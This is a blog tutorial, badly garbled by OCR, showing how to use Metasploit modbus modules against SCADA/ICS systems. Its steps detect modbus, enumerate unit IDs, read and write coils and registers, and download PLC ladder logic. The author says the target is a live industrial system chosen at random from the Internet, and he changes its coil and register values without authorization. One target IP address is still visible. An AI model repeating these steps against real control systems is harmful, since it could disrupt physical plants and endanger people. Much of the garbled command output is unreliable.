LOGIN/SIGN UP GoD ew All Posts OTW# Mar7,2019. 5 min reac Metasploit Basics, Part 16: Metasploit SCADA HackingMetasploit is widely recognized as a powerful tool to conduct penetration testing and hacking on traditional IT systems, but few people recognize that it also has capabilities within the more obscure--but increasingly important-- SCADA/ICS sector. Information security for SCADA/ICS is the next great frontier in our industry! If you want to learn more about SCADA/ICS security and hacking, please see my Section on SCADA Hacking available here. SCADA/ICS systems use entirely different protocols from the traditional IT systems that utilize TCP/IP. These protocols are varied and were usually developed to communicate over serial media (RS485). As a result, the exploits in the SCADA/ICS industry are of an entirely different nature. Metasploit has ported a number of auxiliary and exploit modules for SCADA/ICS. For a complete list, see this article here the SCADA Hacking section. In this tutorial, we will focus on the most widely used SCADA/ICS protocol, modbus. Metasploit has a few modules specifically designed for reconnaissance and exploitation of this most widely used protocol. | will be using a live, functioning SCADA system as my target. This is not a laboratory or VM. It is random system selected from the Internet. | have removed it's IP address to protect the naive and uninformed. No damage was done and all settings were returned to their original state. Step #1: Search for Modbus Modules To begin, let's use the search function in Metasploit to find modbus modules. msf > search modbus.Matching Modules Name Disclosure Date Rank — Descrip ‘tion auxiliary/admin/scada/modicon_conmand 2012-04-05 normal Schneid fer Modicon Renote START/STOP Command auxiliary/admin/scada/nodicon_stux transfer 2612-64-05 normal Schneid fer Modicon Ladder Logic Upload/Download auxiliary/scanner/scada/nodbus_findunitid 2012-10-28 normal Modbus Unit 1D and Station 10 Enunerator auxiliary/scanner/scada/modbusclient normal Modbus Client utility auxiliary/scanner/scada/modbusdetect 2011-11-01 normal Modbus Version Scanner ry, Sometimes these auxiliary modules in Metasploit actually have exploitation: capabilities, as we will see here. ‘As you can see above, we found five(5) modules all categorized as aux ike Let's load a module with a singular reconnaissance capability called modbusdetect. As it name implies, it is capable of detecting whether a site is running the modbus protocol. This would be the first step of reconnaissance and eventually, exploitation. msf > use auxilary/scanner/scada/modbusdetect This module only needs the user to set the IP address of the target as RHOST. The default port for modbus is 502, so the RPORT is set to $02 by default. sf > use auxiliary/scanner/scada/nodbusdetect msf auxiliary(modbusdetect) > show options Module options (auxiliary/scanner/scada/modbusdetect) : Name Current Setting Required Description RHOSTS yes The target address range or CIDR identifi er RPORT 502 yes The torget port THREADS 1 yes ‘The number of concurrent threads TIMEOUT 10 yes Timeout for the network probe UNIT_ID 1 yes ModBus Unit Identifier, 1..255, most ofte al msf auxiliary(modbusdetect) > set RHOSTS RHOSTS sf ouxi Liary(modbusdetect) > exploit Ts 502 - MODBUS - received correct NODBUS) TCP header (unit-1D: 1) TFT Seanned I of I hosts (10% complete] [*] Auxiliary module execution_completedWhen we run this module, it goes to the target system's port 502 and sends a probe to determine whether it is using modbus. As you can see above, it confirms that our target is running modbus and now we can proceed with our modbus-based reconnaissance and exploitation Step #2: Find Unit ID's Now that we have confirmed that the target is actually running the modbus protocol, the next step is to enumerate the Unit ID's of the connected devices. This is similar to a ping sweep in TCP/IP, but the results are slightly less reliable. Modbus allows for up to 254 connected devices, To manipulate or communicate with any modbus device, we must have its UNIT ID, not dissimilar to using IP addresses in TCP/IP. msf > use auxilary/scanner/scanner/modbus_findunitid msf auxiliary(modbusdetect) > use auxiliary/scanner/scade/modbus_findunitid msf auxiliary(modbus findunitid) > show options Module options (auxiliary/scanner/scada/modbus_findunitid) : Name Current Setting Required Description BENICE 1 yes Seconds to sleep between StationID-p robes, just for beeing nice RHOST yes The target address RPORT 502 yes The target port TIMEOUT 2 yes Timeout for the network probe, 8 mea ns no timeout UNIT_ID_FROM 1 yes ModBus Unit Identifier scan from val ue (1. .25a7 UNIT_ID_To 254 yes ModBus Unit Identifier scan to value (UNIT_ID_FROM. .254] msf auxiliary(modbus_findunitid) > set RHOST Once again, for this module, the only variable we need to set is the RHOST. msf > set RHOST msf > exploitasf auxiliary (nodbus findunitid) > set RHOST RHOST => 185.99.139.27 msf auxiliary (nodbus_findunitid) > exploit [+] 502 - Received: correct MODBUS/TCP from stationID 1 (1 502 - Received: correct MODBUS/TCP from stationID 2 (+1 502 - Received: correct MODBUS/TCP from stationID 3 (+1 502 - Received: correct MODBUS/TCP from stationID 4 (+1 502 - Received: correct MODBUS/TCP from stationID 5 [+] 502 - Received: correct MODBUS/TCP from stationID 6 [+] 502 - Received: correct MODBUS/TCP from stationID 7 [+] 502 - Received: correct MODBUS/TCP from stationID 8 [+] 502 - Received: correct MODBUS/TCP from stationID 9 [+1 562 - Received: correct MODBUS/TCP from stationID 10 t+] 502 - Received: correct MODBUS/TCP from stationID 11 I+] 502 - Received: correct MODBUS/TCP from stationID 12 G1 502 - Received: correct MODBUS/TCP from stationID 13 (1 562 - Received: correct MODBUS/TCP from stationID 14 (+ 502 - Received: correct MODBUS/TCP from stationID 15 {+1 502 - Received: correct MODBUS/TCP from stationID 16 [+] 562 - Received: correct MODBUS/TCP from stationID 17 [+ 502 - Received: correct MODBUS/TCP from stationID 18 As you can see, this module was successful in finding each of the Unit ID's of the connected devices. These UNIT ID's are critical for reading and writing their data, as we will see next. Step #3: Reading and Writing the Modbus Devices Our next modbus module is modbusclient. It enables us to read and write the data from both the coils and registers on these SCADA systems. Reading the data can lead to information leakage, but writing the data is even more nefarious as it could change various setting within the plant and cause a malfunction (pay attention cyber warriors!) Let's load this module. msf > use auxiliary/scanner/scada/modbusclientAuxiliary module execution completed msf auxiliary(modbus_findunitid) > use auxiliary/scanner/scada/modbusclient sf auxiliary(modbusélient) > show options Module options (auxiliary/scanner/scada/modbusclient) : Current Setting Required Description DATA no Data to write (WRITE_COIL and WRIT E_REGISTER modes only) DATA_ADDRESS: yes Modbus data address DATA-COILS: no Data in binary to write (WRITE COT LS mode only) e.g. 6110 DATA REGISTERS no Words to write to each register se parated with a comma (WRITE_REGISTERS mode only) ©.9. 1,2,3,4 NUMBER 1 no Number of '‘coits/registers to read (READ_COTLS ans READ_REGISTERS modes only) RHOST yes The target address RPORT 502 yes The target port UNIT_NUMBER 1 no Modbus unit number Auxiliary action Nane Description READ_REGISTERS Read words from several registers This module requires several variables to be set, Most important is the ACTION. This variable can be set as; 1. READ_REGISTERS 2. WRITE_REGISTERS 3. READ_COILS 4, WRITE_COILS Also note the default setting for the UNIT_NUMBER is 1 and NUMBER is 1. This ‘means that by default, it will take its action only on the first UNIT ID and only the first unit, To increase the number of units the ACTION will act on, simply change the variable NUMBER. In this case, | set the NUMBER variable to 100. This means it will start with UNIT ID number 1 and read 100 registers. msf auxiliary(modbusclient) > exploit vl 1502 - Sending READ REGISTERS [+l 502 - 180 register values from address 1 t+ :502 - (8, 6, 6, 0, @, 0, 69, 0, 39, 0, 6, 90, 0, 0, 0, 0, @, ©, 0, 0, 0, 0, 6, 6, 0, 6, 0, 6, 6, 234, 220, 327, 227, 6, 6, 8, 0, 6, 0, 0, O, 6464, 0, 4, 0, 0, 0, 0, 6, 192, 32, 0, 1, 0, 1, 0, 1, 0, 6, 3, 480, 0, 0, 0, O, ©, 8, 0, 8, 0, , 8, 0, 8, 0, 6, 0, 0, 8, 0, &, 8, 8, 8, 0, 0, 0, 8, 0, 0, 6, & , 6, 6, 6, 8, 6, 6, 6, 4] (e1"auxitiary module execution completed‘As you can see in the screenshot above, we were able to read the values from the first 100 registers. Next, let's try writing to the coils. In SCADA/ICS terminology, coils are devices on the network that are either ON or OFF, Their settings are either 1 or 0, By changing the values of a coil, you are switching it on or off. First, we need to change the ACTION to WRITE_COIL. msf > set ACTION WRITE_COIL Inst auxiUlary(nodbuceLiont) > set ACTION WRITE_COTL ReTrOw => welTe. com GE auxiLiary(nodbuscLient) > show options Modute options (auxiliary/scanner/scada/nodbusclient) Nove Current Setting Required Description ata Data to write (WRITE.COTL and WRIT E_REGISTER nodes onty) ‘DATA-ADORESS. I yes _Nodbus data address DATACCOILS, fo Data in binary to write (WRITE COE LS aode-onty) ¢.9. 0110 DATA REGISTERS no Words to weite to each register s0 porated wlth 0 comma, (WRITE REGISTERS mode only) @°9.°112,3+4 NuMBER “0. Nonber’ of coiis/registers to reed (READ-COILS ans READ-REGISTERS nodes" only) Rost ‘yer The target adaress RoR sea yor The target port UuTT-MweER 1 fo Nodbus unt number Auxiliary action: Nave Description WAITE_COIL Write one bit to a cot Next, set the DATA equal to I(only 1 or 0 are valid values). msf > set DATA 1 |mst auxitiary(modbuseLient) > set DATA 1 Data => 1 Inst auxiliary(modbusctient) > exploit i 502 - Sending WRITE COIL... t+] 1502 - Value 1 successfully written at coil address 1 [*] Auxiliary module execution completed‘As you can see above, we successfully changed the value of the coil to 1! To check whether the value actually changed, we can now go back and read the coils. msf > set ACTION READ_COILS (msi auxiliary(modbusclient) > set ACTION READ COILS ‘ACTION => READ_COILS |mst auxiliary(jodbusclient) > exploit 1 502 - Sending READ COILS... \t+1 1502 - 100 coil values from address 1 t+) 3502 - [1, 6, 0, 8, 0, 0, 0, 8, 0, 8, 0, 0, 8, 0, 0, 8, 0, O 6, 6, 6, 6, 6, 6, 0, 0, 6, 6, 6, 6, 0, 6, 6, 6, 8 6,6, 6, 0 6 6 0, 6 4, 6, 6 6, 6, 6, 0, 6, 0, 0 & 6 6 6, 6, 6, 6, 8, 6, 6, 6, 6, 6, 0, 6 0, 6, 6, 6, 0, 8, 0, 0, 0, 0, & 8 6, 6, 6, o 4 Au xiliary module execution completed The value of the first coil was successfully set to 1 while all the others are still set to 0. Now, let's try to change the values in the registers. These are memory areas that hold values used within the device to set such things as how long to run a pump or at what pressure should a valve open. Changing these values could have dire repercussions. Let's first write the values in the registers msf > set ACTION WRITE_REGISTERS Then, provide the data we want written to the registers. We set the data values by using the DATA variable and multiple values must be added separated by commas. In this case, let's add 5 (five) 27's to the first five registers. msf> set DATA 27,27,27,27,27 After we hit exploit, Metasploit returns that 5 values have been written.Ist auxiliary(modbusclient) > set DATA REGISTERS 27,27,27,27,27 DATA REGISTERS =>. 27027.27.27,27 nat auxiliary(modbasclient) > exploit 1 502 - Sending WRITE REGISTERS. [+ 502 - Values 27,27,27,27,27 successfully written from regist ry address 1 [*] Auxiliary module execution completed sf auxiliary(modbusclient) > set ACTION READ REGISTERS ACTION => READ_REGISTERS msf auxiliery(modbusclient) > exploit 2502 - Sending READ REGISTERS. . 7) {s} i502 - Leo register values trom’ address 1 tt $592 Came, 69, 8, 43, 8, 7, 97, 0, 8, 8, © 9, 0, 0, 8, j, 212, 224, 223, 0, 8, 6, 0, 0, 0, @ aa) 0, 0, 8, 0, @, 7 + 8, +0, 6464, 0, 4, 6, 8, 0, 0, 2, 0, 1, 0, 1, 8, 1, 6, 6, 3, 480, 0, 0, +, 0, 0, 8, 0, 0, 8, 0, O, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, O, a, 0, 6, 0, 6, 6, 6, 6, 6 6, 0, 6, 4, 4) (4) Auxiliary’ module execution completed To check to see whether the values have actually changed, we can change the ACTION to READ_REGISTERS. msf > set ACTION READ_REGISTERS As you can see, the first 5 register value shave been changed to 27. This could be very dangerous! Step #5 Download the PLC Ladder Logic Within a SCADA/ICS network, PLC's are the brains behind the actions taking place inside the network. These small computers are programmed to control the devices connected to them. The software program is referred to as “Ladder Logic” An attacker would likely want to download and analyze the PLC's ladder logic to illuminate what the PLC is controlling and how. By understanding the logic, values can then be changed that might have devastating impact on the facility. No one, but the administrator, should be able to view this logic. Unfortunately, some administrators don't protect their ladder logic and make it available to anyone who tries to download it. It's worth noting that the famous malware Stuxnet did this before uploading new, destructive ladder logic to the Iranian uranium enrichment centrifuges. Let's try to do this at our target facility The first step is to load the proper module. msf > use auxiliary/admin/scada/modicon_stux_transfer We only need toset our MODE variable to receive (RECV) and our RHOST to that of our target.inst auxiliary(nodbuscLient) > use auxiliary/adnin/scada/nodicon_stux_transter MMSE ouniLlaryteodicon stax transfer) > show options Modute options (auxitiery/adain/scade/nodicon_stux transfer) None Current Setting B equired Description FILENAME /4st/shavesmetasploit-tramevork/data/exptolts/nodicon tadder.ape Nhe file to send or receive wove 7° Send ¥ es File transfer operation (Accepted: SEND, RECV) vost y es the target address port |" 302 ¥ 9 the target port ist nvxiLiory(nodicon stux transfer) > set MODE RECY Hobe” => RECY" sf auxitiary(sodicon stux transfer) > set RMOST st auxiltary(mogicon stux transfer) > exploit 11 1382 302 -fWopous — sonding read request V y 502 _|wopBus Retrieving Tite When we enter exploit, if the ladder logic is unprotected, it will begin to download the program as we successfully did. Conclusion Many industrial systems can be accessed and manipulated through some simple modbus modules in Metasploit. This manipulation of coils and registers has the potential for disastrous circumstances in the wrong hands. It is time for the SCADA/ICS industry to take security seriously before such dire circumstances take place! G3) 4,654 views 0 comments 9 Recent Posts See All‘SCADA Hacking: Snake, 2 New Variant OSINT: Track te Crisis in Belarus with of Ransomware Targets SCADAYICS Ransomware:Bulé Your Own yanair Fight with RadarBox ansomware, Par 1 Os Do 9 On Oe 9° @ws Go 9 Comments Write a comment. oe @ meet